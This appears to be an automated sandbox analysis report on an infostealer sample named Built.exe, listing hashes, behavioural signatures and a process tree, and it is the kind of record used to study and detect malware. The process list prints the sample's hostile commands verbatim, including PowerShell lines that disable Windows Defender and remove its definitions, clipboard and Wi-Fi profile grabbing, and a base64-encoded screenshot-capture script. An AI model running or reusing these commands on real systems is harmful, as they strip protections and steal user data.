Analysis
-
max time kernel
139s -
max time network
108s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-10-2024 17:54
Behavioral task
behavioral1
Sample
Built.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Built.exe
Resource
win10v2004-20241007-en
General
-
Target
Built.exe
-
Size
5.9MB
-
MD5
b3ba5d84c400a142171cbf1ad29b9cbd
-
SHA1
7220c2fa5bc3a688e8d28e29c2f0ef5743514286
-
SHA256
2ab620cda8ec28e775673d93c0e25db26d5c042fba24b8bde160ad963bd18dda
-
SHA512
4ae0a0e5e98bfd3a557bc3d12c526609073f73e2d0391b95cb18b89b2e39479f359ecec0ea552c75e03d94e2d9129b22bc46096176e6b38644001202fef50b35
-
SSDEEP
98304:z7De7pzWqX8MMhJMjarCtaCObO/OH9KkqQz4W1kgeDVFMZu3/MQt:z+NzWvB6yA+KO0WR4iZTQt
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1720 powershell.exe 1876 powershell.exe 4516 powershell.exe 4956 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3384 cmd.exe 2604 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4380 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe 868 Built.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 30 discord.com 29 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3348 tasklist.exe 4384 tasklist.exe 4528 tasklist.exe 4568 tasklist.exe -
resource yara_rule behavioral2/files/0x0007000000023ca2-21.dat upx behavioral2/memory/868-25-0x00007FF9D9E00000-0x00007FF9DA266000-memory.dmp upx behavioral2/files/0x0007000000023c95-27.dat upx behavioral2/memory/868-30-0x00007FF9E9320000-0x00007FF9E9344000-memory.dmp upx behavioral2/files/0x0007000000023ca0-29.dat upx behavioral2/files/0x0007000000023c9c-48.dat upx behavioral2/files/0x0007000000023c9b-47.dat upx behavioral2/files/0x0007000000023c9a-46.dat upx behavioral2/files/0x0007000000023c99-45.dat upx behavioral2/files/0x0007000000023c98-44.dat upx behavioral2/files/0x0007000000023c97-43.dat upx behavioral2/files/0x0007000000023c96-42.dat upx behavioral2/files/0x0007000000023c94-41.dat upx behavioral2/files/0x0007000000023ca7-40.dat upx behavioral2/files/0x0007000000023ca6-39.dat upx behavioral2/files/0x0007000000023ca5-38.dat upx behavioral2/files/0x0007000000023ca1-35.dat upx behavioral2/files/0x0007000000023c9f-34.dat upx behavioral2/memory/868-32-0x00007FF9F0C30000-0x00007FF9F0C3F000-memory.dmp upx behavioral2/memory/868-54-0x00007FF9E8550000-0x00007FF9E857C000-memory.dmp upx behavioral2/memory/868-56-0x00007FF9EBAD0000-0x00007FF9EBAE8000-memory.dmp upx behavioral2/memory/868-58-0x00007FF9E8530000-0x00007FF9E854F000-memory.dmp upx behavioral2/memory/868-60-0x00007FF9D95C0000-0x00007FF9D973D000-memory.dmp upx behavioral2/memory/868-62-0x00007FF9E7B40000-0x00007FF9E7B59000-memory.dmp upx behavioral2/memory/868-64-0x00007FF9E92E0000-0x00007FF9E92ED000-memory.dmp upx behavioral2/memory/868-66-0x00007FF9E71A0000-0x00007FF9E71CE000-memory.dmp upx behavioral2/memory/868-72-0x00007FF9E85D0000-0x00007FF9E8688000-memory.dmp upx behavioral2/memory/868-74-0x00007FF9D8860000-0x00007FF9D8BD5000-memory.dmp upx behavioral2/memory/868-78-0x00007FF9E87A0000-0x00007FF9E87AD000-memory.dmp upx behavioral2/memory/868-77-0x00007FF9EF3A0000-0x00007FF9EF3B5000-memory.dmp upx behavioral2/memory/868-71-0x00007FF9E9320000-0x00007FF9E9344000-memory.dmp upx behavioral2/memory/868-70-0x00007FF9D9E00000-0x00007FF9DA266000-memory.dmp upx behavioral2/memory/868-80-0x00007FF9D9810000-0x00007FF9D9928000-memory.dmp upx behavioral2/memory/868-135-0x00007FF9E8530000-0x00007FF9E854F000-memory.dmp upx behavioral2/memory/868-179-0x00007FF9D95C0000-0x00007FF9D973D000-memory.dmp upx behavioral2/memory/868-206-0x00007FF9E7B40000-0x00007FF9E7B59000-memory.dmp upx behavioral2/memory/868-280-0x00007FF9E71A0000-0x00007FF9E71CE000-memory.dmp upx behavioral2/memory/868-283-0x00007FF9E85D0000-0x00007FF9E8688000-memory.dmp upx behavioral2/memory/868-304-0x00007FF9D8860000-0x00007FF9D8BD5000-memory.dmp upx behavioral2/memory/868-310-0x00007FF9E8530000-0x00007FF9E854F000-memory.dmp upx behavioral2/memory/868-311-0x00007FF9D95C0000-0x00007FF9D973D000-memory.dmp upx behavioral2/memory/868-305-0x00007FF9D9E00000-0x00007FF9DA266000-memory.dmp upx behavioral2/memory/868-306-0x00007FF9E9320000-0x00007FF9E9344000-memory.dmp upx behavioral2/memory/868-320-0x00007FF9D9E00000-0x00007FF9DA266000-memory.dmp upx behavioral2/memory/868-348-0x00007FF9D9810000-0x00007FF9D9928000-memory.dmp upx behavioral2/memory/868-347-0x00007FF9EF3A0000-0x00007FF9EF3B5000-memory.dmp upx behavioral2/memory/868-346-0x00007FF9E87A0000-0x00007FF9E87AD000-memory.dmp upx behavioral2/memory/868-345-0x00007FF9E85D0000-0x00007FF9E8688000-memory.dmp upx behavioral2/memory/868-344-0x00007FF9E71A0000-0x00007FF9E71CE000-memory.dmp upx behavioral2/memory/868-343-0x00007FF9E92E0000-0x00007FF9E92ED000-memory.dmp upx behavioral2/memory/868-342-0x00007FF9E7B40000-0x00007FF9E7B59000-memory.dmp upx behavioral2/memory/868-341-0x00007FF9D95C0000-0x00007FF9D973D000-memory.dmp upx behavioral2/memory/868-340-0x00007FF9EBAD0000-0x00007FF9EBAE8000-memory.dmp upx behavioral2/memory/868-339-0x00007FF9E8530000-0x00007FF9E854F000-memory.dmp upx behavioral2/memory/868-338-0x00007FF9E8550000-0x00007FF9E857C000-memory.dmp upx behavioral2/memory/868-337-0x00007FF9E9320000-0x00007FF9E9344000-memory.dmp upx behavioral2/memory/868-336-0x00007FF9F0C30000-0x00007FF9F0C3F000-memory.dmp upx behavioral2/memory/868-335-0x00007FF9D8860000-0x00007FF9D8BD5000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3360 cmd.exe 3956 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1692 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1180 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 1720 powershell.exe 1720 powershell.exe 1876 powershell.exe 1876 powershell.exe 2604 powershell.exe 2604 powershell.exe 4412 powershell.exe 4412 powershell.exe 2604 powershell.exe 1720 powershell.exe 1720 powershell.exe 1876 powershell.exe 4412 powershell.exe 4516 powershell.exe 4516 powershell.exe 4656 powershell.exe 4656 powershell.exe 4956 powershell.exe 4956 powershell.exe 1580 powershell.exe 1580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3348 tasklist.exe Token: SeDebugPrivilege 4384 tasklist.exe Token: SeDebugPrivilege 1720 powershell.exe Token: SeDebugPrivilege 1876 powershell.exe Token: SeIncreaseQuotaPrivilege 3704 WMIC.exe Token: SeSecurityPrivilege 3704 WMIC.exe Token: SeTakeOwnershipPrivilege 3704 WMIC.exe Token: SeLoadDriverPrivilege 3704 WMIC.exe Token: SeSystemProfilePrivilege 3704 WMIC.exe Token: SeSystemtimePrivilege 3704 WMIC.exe Token: SeProfSingleProcessPrivilege 3704 WMIC.exe Token: SeIncBasePriorityPrivilege 3704 WMIC.exe Token: SeCreatePagefilePrivilege 3704 WMIC.exe Token: SeBackupPrivilege 3704 WMIC.exe Token: SeRestorePrivilege 3704 WMIC.exe Token: SeShutdownPrivilege 3704 WMIC.exe Token: SeDebugPrivilege 3704 WMIC.exe Token: SeSystemEnvironmentPrivilege 3704 WMIC.exe Token: SeRemoteShutdownPrivilege 3704 WMIC.exe Token: SeUndockPrivilege 3704 WMIC.exe Token: SeManageVolumePrivilege 3704 WMIC.exe Token: 33 3704 WMIC.exe Token: 34 3704 WMIC.exe Token: 35 3704 WMIC.exe Token: 36 3704 WMIC.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 4528 tasklist.exe Token: SeDebugPrivilege 4412 powershell.exe Token: SeIncreaseQuotaPrivilege 3704 WMIC.exe Token: SeSecurityPrivilege 3704 WMIC.exe Token: SeTakeOwnershipPrivilege 3704 WMIC.exe Token: SeLoadDriverPrivilege 3704 WMIC.exe Token: SeSystemProfilePrivilege 3704 WMIC.exe Token: SeSystemtimePrivilege 3704 WMIC.exe Token: SeProfSingleProcessPrivilege 3704 WMIC.exe Token: SeIncBasePriorityPrivilege 3704 WMIC.exe Token: SeCreatePagefilePrivilege 3704 WMIC.exe Token: SeBackupPrivilege 3704 WMIC.exe Token: SeRestorePrivilege 3704 WMIC.exe Token: SeShutdownPrivilege 3704 WMIC.exe Token: SeDebugPrivilege 3704 WMIC.exe Token: SeSystemEnvironmentPrivilege 3704 WMIC.exe Token: SeRemoteShutdownPrivilege 3704 WMIC.exe Token: SeUndockPrivilege 3704 WMIC.exe Token: SeManageVolumePrivilege 3704 WMIC.exe Token: 33 3704 WMIC.exe Token: 34 3704 WMIC.exe Token: 35 3704 WMIC.exe Token: 36 3704 WMIC.exe Token: SeDebugPrivilege 4568 tasklist.exe Token: SeDebugPrivilege 4516 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeIncreaseQuotaPrivilege 3292 WMIC.exe Token: SeSecurityPrivilege 3292 WMIC.exe Token: SeTakeOwnershipPrivilege 3292 WMIC.exe Token: SeLoadDriverPrivilege 3292 WMIC.exe Token: SeSystemProfilePrivilege 3292 WMIC.exe Token: SeSystemtimePrivilege 3292 WMIC.exe Token: SeProfSingleProcessPrivilege 3292 WMIC.exe Token: SeIncBasePriorityPrivilege 3292 WMIC.exe Token: SeCreatePagefilePrivilege 3292 WMIC.exe Token: SeBackupPrivilege 3292 WMIC.exe Token: SeRestorePrivilege 3292 WMIC.exe Token: SeShutdownPrivilege 3292 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2076 wrote to memory of 868 2076 Built.exe 84 PID 2076 wrote to memory of 868 2076 Built.exe 84 PID 868 wrote to memory of 4160 868 Built.exe 88 PID 868 wrote to memory of 4160 868 Built.exe 88 PID 868 wrote to memory of 5012 868 Built.exe 89 PID 868 wrote to memory of 5012 868 Built.exe 89 PID 868 wrote to memory of 3836 868 Built.exe 92 PID 868 wrote to memory of 3836 868 Built.exe 92 PID 868 wrote to memory of 3080 868 Built.exe 93 PID 868 wrote to memory of 3080 868 Built.exe 93 PID 868 wrote to memory of 3384 868 Built.exe 96 PID 868 wrote to memory of 3384 868 Built.exe 96 PID 868 wrote to memory of 2268 868 Built.exe 97 PID 868 wrote to memory of 2268 868 Built.exe 97 PID 868 wrote to memory of 3536 868 Built.exe 98 PID 868 wrote to memory of 3536 868 Built.exe 98 PID 868 wrote to memory of 5044 868 Built.exe 101 PID 868 wrote to memory of 5044 868 Built.exe 101 PID 868 wrote to memory of 3360 868 Built.exe 103 PID 868 wrote to memory of 3360 868 Built.exe 103 PID 3836 wrote to memory of 3348 3836 cmd.exe 105 PID 3836 wrote to memory of 3348 3836 cmd.exe 105 PID 3080 wrote to memory of 4384 3080 cmd.exe 107 PID 3080 wrote to memory of 4384 3080 cmd.exe 107 PID 5012 wrote to memory of 1876 5012 cmd.exe 108 PID 5012 wrote to memory of 1876 5012 cmd.exe 108 PID 4160 wrote to memory of 1720 4160 cmd.exe 109 PID 4160 wrote to memory of 1720 4160 cmd.exe 109 PID 868 wrote to memory of 4760 868 Built.exe 110 PID 868 wrote to memory of 4760 868 Built.exe 110 PID 868 wrote to memory of 632 868 Built.exe 137 PID 868 wrote to memory of 632 868 Built.exe 137 PID 868 wrote to memory of 1888 868 Built.exe 113 PID 868 wrote to memory of 1888 868 Built.exe 113 PID 3384 wrote to memory of 2604 3384 cmd.exe 116 PID 3384 wrote to memory of 2604 3384 cmd.exe 116 PID 3536 wrote to memory of 4528 3536 cmd.exe 117 PID 3536 wrote to memory of 4528 3536 cmd.exe 117 PID 2268 wrote to memory of 3704 2268 cmd.exe 119 PID 2268 wrote to memory of 3704 2268 cmd.exe 119 PID 5044 wrote to memory of 1456 5044 cmd.exe 120 PID 5044 wrote to memory of 1456 5044 cmd.exe 120 PID 3360 wrote to memory of 3956 3360 cmd.exe 121 PID 3360 wrote to memory of 3956 3360 cmd.exe 121 PID 632 wrote to memory of 4436 632 cmd.exe 122 PID 632 wrote to memory of 4436 632 cmd.exe 122 PID 1888 wrote to memory of 4412 1888 cmd.exe 124 PID 1888 wrote to memory of 4412 1888 cmd.exe 124 PID 4760 wrote to memory of 1180 4760 cmd.exe 123 PID 4760 wrote to memory of 1180 4760 cmd.exe 123 PID 868 wrote to memory of 1540 868 Built.exe 125 PID 868 wrote to memory of 1540 868 Built.exe 125 PID 868 wrote to memory of 1420 868 Built.exe 161 PID 868 wrote to memory of 1420 868 Built.exe 161 PID 1540 wrote to memory of 1324 1540 cmd.exe 129 PID 1540 wrote to memory of 1324 1540 cmd.exe 129 PID 1420 wrote to memory of 1396 1420 cmd.exe 130 PID 1420 wrote to memory of 1396 1420 cmd.exe 130 PID 868 wrote to memory of 1964 868 Built.exe 131 PID 868 wrote to memory of 1964 868 Built.exe 131 PID 868 wrote to memory of 432 868 Built.exe 132 PID 868 wrote to memory of 432 868 Built.exe 132 PID 1964 wrote to memory of 2900 1964 cmd.exe 135 PID 1964 wrote to memory of 2900 1964 cmd.exe 135 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1396 attrib.exe 2552 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:4436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH